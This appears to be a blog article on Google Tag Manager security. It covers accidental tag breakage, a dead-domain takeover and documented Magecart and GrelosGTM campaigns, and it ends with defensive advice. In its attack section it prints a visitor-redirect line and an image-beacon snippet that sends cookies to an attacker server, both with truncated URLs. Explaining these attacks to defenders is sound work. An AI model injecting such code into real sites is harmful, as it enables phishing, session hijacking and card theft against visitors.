What does that mean?<\/p>\n\n\n\n
Anyone with Publish access to a container can inject arbitrary JavaScript into your website. No code review. And the visitor\u2019s browser will dutifully execute it.<\/p>\n\n\n\n
This isn\u2019t a theoretical risk. Over the years, I\u2019ve dealt with consequences ranging from broken tracking and non-functional websites to actual security incidents. This article shows what can go wrong. And how to prevent it.<\/p>\n\n\n\n
Negligence \u2014 How to Break Your Site by Accident<\/h2>\n\n\n\n
Most GTM problems don\u2019t come from attacks. They come from someone adding a tag without proper testing. Or without thinking through all the implications.<\/p>\n\n\n\n
JavaScript Conflicts<\/h3>\n\n\n\n
GTM tags run in the same execution context as the rest of the page. It\u2019s easy to accidentally break a developer\u2019s carefully crafted frontend. Common issues:<\/p>\n\n\n\n
- \n
- A script overwrites a global variable or prototype that other code depends on<\/li>\n\n\n\n
- A tag calls
stopPropagation()<\/code> orpreventDefault()<\/code>, blocking events for other handlers<\/li>\n\n\n\n- A heavy script (heatmap, session recording) blocks the main thread and the page becomes unresponsive<\/li>\n\n\n\n
- A tag modifies DOM elements that the page\u2019s framework (React, Vue) relies on<\/li>\n<\/ul>\n\n\n\n
Rule of thumb: test every new tag on the actual website \u2014 not just in GTM Preview mode, but in the context of the entire page framework.<\/p>\n\n\n\n
<\/div>\n\n\n\nSilent Data Loss<\/h3>\n\n\n\n
A tag stops working \u2014 the vendor changes their script domain, the script throws an error, CSP blocks it. But since GTM tags fail silently (no error message for the user), nobody notices. You find out weeks later when you look at your data and see a gap you can\u2019t backfill.<\/p>\n\n\n\n
From a business perspective, this is the most expensive type of error. You\u2019re making decisions based on data that doesn\u2019t exist. And you don\u2019t even know it.<\/p>\n\n\n\n
<\/div>\n\n\n\nInfinite Loops<\/h3>\n\n\n\n
Imagine this scenario: you set up a tag to track JavaScript errors. The tag fires on error. But the tag itself throws an error (maybe because its destination domain is blocked). That triggers the tag again. And again. And again \u2014 until the browser freezes or the tab crashes.<\/p>\n\n\n\n
<\/div>\n\n\n\nDead Domain Takeover \u2014 A Story from the Field<\/h3>\n\n\n\n
I dealt with a case where a client had added a GTM tag from a small analytics platform. The platform eventually shut down and let its domain expire. Someone bought the domain and started serving malicious scripts from it.<\/p>\n\n\n\n
Result: GTM on the client\u2019s website kept loading the tag pointing to that domain. Visitors\u2019 browsers downloaded and executed the attacker\u2019s code \u2014 through a legitimate GTM container, on a legitimate website.<\/p>\n\n\n\n
Nobody noticed for about a month. The tag had been in the container \u201cforever,\u201d nobody knew what it did, and nobody checked whether the platform still existed.<\/p>\n\n\n\n
After a month, the script started redirecting the website to a completely different domain. Panic ensued.<\/p>\n\n\n\n
Lesson:<\/strong> Dead tags in GTM aren\u2019t just clutter. They\u2019re a security risk. Every third-party script is a dependency \u2014 and dependencies die.<\/p>\n\n\n\n
<\/div>\n\n\n\nIntent \u2014 What Someone with GTM Access Can Do<\/h2>\n\n\n\n
Everything above happened by accident. Now let\u2019s look at what happens when someone wants<\/strong> to cause damage. All they need is Publish access to a GTM container and a Custom HTML tag.<\/p>\n\n\n\n
<\/div>\n\n\n\nRedirecting Visitors<\/h3>\n\n\n\n
The simplest attack \u2014 one line of JavaScript:<\/p>\n\n\n\n
window.location.href = 'Every visitor immediately lands on the attacker\u2019s page. Phishing, malware downloads, anything.<\/p>\n\n\n\n
<\/div>\n\n\n\nPage Defacement<\/h3>\n\n\n\n
An attacker can inject arbitrary HTML into the page \u2014 images, fake forms, fake payment gateways. The visitor won\u2019t notice the difference because they\u2019re still on the legitimate domain.<\/p>\n\n\n\n
Session and Cookie Theft<\/h3>\n\n\n\n
var img = document.createElement('img');\nimg.src = 'An invisible image sends all cookies to the attacker\u2019s server. If that includes a session token, the attacker logs in as an admin \u2014 without knowing the password.<\/p>\n\n\n\n
Payment Data Theft (Magecart)<\/h3>\n\n\n\n
A more sophisticated variant: the attacker uses GTM to inject JavaScript that overlays the real checkout form with a fake one. The customer enters their card number \u2014 the data goes to both the attacker and the legitimate payment gateway. The customer notices nothing. The merchant notices nothing. The bank catches it months later.<\/p>\n\n\n\n
<\/div>\n\n\n\nReal Attacks \u2014 Not Theory, Practice<\/h2>\n\n\n\n
These aren\u2019t hypothetical scenarios. They\u2019re documented cases.<\/p>\n\n\n\n
<\/div>\n\n\n\nMagecart on Magento Stores (2025)<\/h3>\n\n\n\n
Security firm Sucuri discovered malware<\/a> hidden in GTM container GTM-MLHK2N68<\/strong> on Magento e-commerce sites. The payload was stored in the
cms_block.content<\/code> database table \u2014 Base64-encoded JavaScript disguised as a legitimate Google Analytics script.<\/p>\n\n\n\nIn reality, it was a script stealing payment data from checkout forms.<\/p>\n\n\n\n
Numbers from Recorded Future<\/a>: 165,000+ payment card records<\/strong> linked to GTM attacks ended up on the dark web. 569 e-commerce domains<\/strong> infected with malicious scripts spread through GTM. Average time before the merchant notices and fixes the problem: over 3 months<\/strong>.<\/p>\n\n\n\n
<\/div>\n\n\n\nGrelosGTM Campaign (2020+)<\/h3>\n\n\n\n
Group-IB analysts identified<\/a> an organized group called GrelosGTM. The attackers injected references to their own GTM container (GTM-5SF293J<\/strong>) into compromised websites\u2019 source code. The container loaded the next attack stage from the attacker\u2019s server.<\/p>\n\n\n\n
The elegance of the attack: a GTM container is a legitimate Google service. Security tools don\u2019t block it by default.<\/p>\n\n\n\n
<\/div>\n\n\n\nContainer Hijacking \u2014 Multi-Site Cloaking<\/h3>\n\n\n\n
An attacker stole a legitimate website\u2019s GTM container ID and embedded it on a network of spam domains. Result: the legitimate site\u2019s analytics data was polluted with fake traffic, SEO was damaged by association with toxic domains, and the site\u2019s content was scraped.<\/p>\n\n\n\n
The client only noticed thanks to a \u201cContainer quality: Needs Attention\u201d warning in the GTM interface.<\/p>\n\n\n\n
<\/div>\n\n\n\nBypassing WAF and CSP via GTM (Raxis)<\/h3>\n\n\n\n
Security firm Raxis demonstrated an attack<\/a> combining an XSS vulnerability with GTM:<\/p>\n\n\n\n
- \n
- Attacker finds an XSS vulnerability on the website<\/li>\n\n\n\n
- Injects a reference to their own<\/strong> GTM container with a Custom HTML tag containing malicious code<\/li>\n\n\n\n
- The payload lives on
googletagmanager.com<\/code> \u2014 the WAF doesn\u2019t flag it, CSP allows it (because Google is on the allowlist)<\/li>\n\n\n\n- Malicious code executes in the page context \u2014 full access to cookies, session tokens, DOM<\/li>\n<\/ol>\n\n\n\n
Google acknowledged it as an \u201chonorable mention\u201d in the Bug Bounty program. There\u2019s no fix \u2014 this is by design. GTM is a JavaScript hosting platform, and Google operates it intentionally.<\/p>\n\n\n\n
<\/div>\n\n\n\nWho Has the Keys to Your Website?<\/h2>\n\n\n\n
After reading the sections above, one thing should be clear: whoever has Publish access to your GTM container has de facto root access to your website<\/strong> from the visitor\u2019s perspective.<\/p>\n\n\n\n
GTM Roles and What They Mean<\/h3>\n\n\n\n
- \n
- Administrator<\/strong> \u2014 full control, can add\/remove users<\/li>\n\n\n\n
- Publish<\/strong> \u2014 can push changes to the live site. This is the critical role.<\/li>\n\n\n\n
- Approve<\/strong> \u2014 can approve changes but not publish (useful for approval workflows)<\/li>\n\n\n\n
- Edit<\/strong> \u2014 can modify tags but not publish<\/li>\n\n\n\n
- Read<\/strong> \u2014 view only<\/li>\n<\/ul>\n\n\n\n
Where Problems Arise<\/h3>\n\n\n\n
- \n
- Agencies and freelancers<\/strong> \u2014 the engagement ended a year ago, access remains<\/li>\n\n\n\n
- Former employees<\/strong> \u2014 the marketer left, nobody revoked their account<\/li>\n\n\n\n
- Vendor requests<\/strong> \u2014 \u201cGive us GTM access, we\u2019ll set up your pixel.\u201d You hand them Publish and forget.<\/li>\n\n\n\n
- Shared accounts<\/strong> \u2014 one Google account for the entire marketing team. Who published what? Nobody knows.<\/li>\n<\/ul>\n\n\n\n
A Simple Test<\/h3>\n\n\n\n
Open GTM \u2192 Admin \u2192 User Management. How many people do you see? How many of them still work with you? How many actually need Publish access?<\/p>\n\n\n\n
If the answer to any of these is \u201cI don\u2019t know\u201d \u2014 you have a problem.<\/p>\n\n\n\n
<\/div>\n\n\n\nHow to Defend Yourself<\/h2>\n\n\n\n
1. Access Audit<\/h3>\n\n\n\n
At least once a quarter, review the user list in GTM. Remove inactive accounts. Downgrade permissions where Publish isn\u2019t needed.<\/p>\n\n\n\n
<\/div>\n\n\n\n2. Approval Process<\/h3>\n\n\n\n
GTM supports Workspaces (even in the free version) and formal approval mode in the paid GTM 360 version. Even without 360, you can set an internal rule: no tag goes live without a second pair of eyes. Yes, it slows the process by hours. No, that\u2019s not an argument against \u2014 it\u2019s an argument for.<\/p>\n\n\n\n
<\/div>\n\n\n\n3. Templates Over Custom HTML<\/h3>\n\n\n\n
A Custom HTML tag = arbitrary JavaScript with no restrictions. Templates from the Community Template Gallery run in a sandboxed environment with a defined API (
sendPixel<\/code>,injectScript<\/code>,setCookie<\/code>). Minimize Custom HTML. Ideally, eliminate it.<\/p>\n\n\n\n<\/div>\n\n\n\n4. Versioning and Naming<\/h3>\n\n\n\n
GTM keeps version history. Name each version clearly (not \u201cv47\u201d but \u201cAdded Meta CAPI tag \u2014 approved by Pavel\u201d). During an incident, this lets you roll back to the last working version in minutes.<\/p>\n\n\n\n
<\/div>\n\n\n\n5. Dead Tags = Dead Dependencies<\/h3>\n\n\n\n
Regularly review your container. If a tag points to a domain that doesn\u2019t respond or whose service no longer exists \u2014 delete it. Don\u2019t just pause. Delete.<\/p>\n\n\n\n
<\/div>\n\n\n\n6. Content Security Policy<\/h3>\n\n\n\n
An HTTP header that tells the browser which scripts are allowed to run on the page. It\u2019s the technically strongest defense \u2014 but also the most complex to configure correctly alongside GTM. Details in the follow-up article.<\/strong><\/p>\n\n\n\n
<\/div>\n\n\n\n7. Monitoring<\/h3>\n\n\n\n
Track GTM change history. Set up alerts for new container versions. If you have CSP, monitor violation reports \u2014 they\u2019ll show you what\u2019s trying to run without permission.<\/p>\n\n\n\n
<\/div>\n\n\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\")
<\/figure>\n<\/div>\n\n\n\n\nLab note<\/strong><\/h3>\n\n\n\n
It\u2019s a dual-use problem<\/a> \u2014 the same research that develops vaccines can create biological weapons. GTM is designed for managing measurement. But in an attacker\u2019s hands, it\u2019s a script injector with a trusted address \u2014
googletagmanager.com<\/code> \u2014 that firewalls and security policies allow by default.<\/p>\n<\/div>\n<\/div>\n\n\n\n<\/div>\n\n\n\nConclusion<\/h2>\n\n\n\n
GTM isn\u2019t dangerous by itself. It\u2019s dangerous without oversight \u2014 without access audits, without an approval process, without dead tag cleanup.<\/p>\n\n\n\n
Practical first step:<\/strong> open GTM \u2192 Admin \u2192 User Management. Look at who\u2019s there. How many of those people actually need the right to publish code to your website?<\/p>\n\n\n\n
Second step: review your Custom HTML tags. Do you know what each one does? Does the domain it loads scripts from still exist?<\/p>\n\n\n\n
And if you want to know how to reconcile GTM with your website\u2019s Content Security Policy so that tracking works and the site stays protected \u2014 read the follow-up article [GTM vs. CSP].<\/p>\n\n\n\n
Need help with a GTM audit or setting up secure tracking? Get in touch<\/a> \u2014 let\u2019s go through it together.<\/p>\n\n\n\n
<\/div>\n\n\n\n - Former employees<\/strong> \u2014 the marketer left, nobody revoked their account<\/li>\n\n\n\n
- Publish<\/strong> \u2014 can push changes to the live site. This is the critical role.<\/li>\n\n\n\n
- The payload lives on
![\"\"](\"https:\/\/www.sabatka.net\/wp-content\/uploads\/2026\/04\/null-did-you-know.png\")
<\/figure>\n<\/div>\n\n\n\n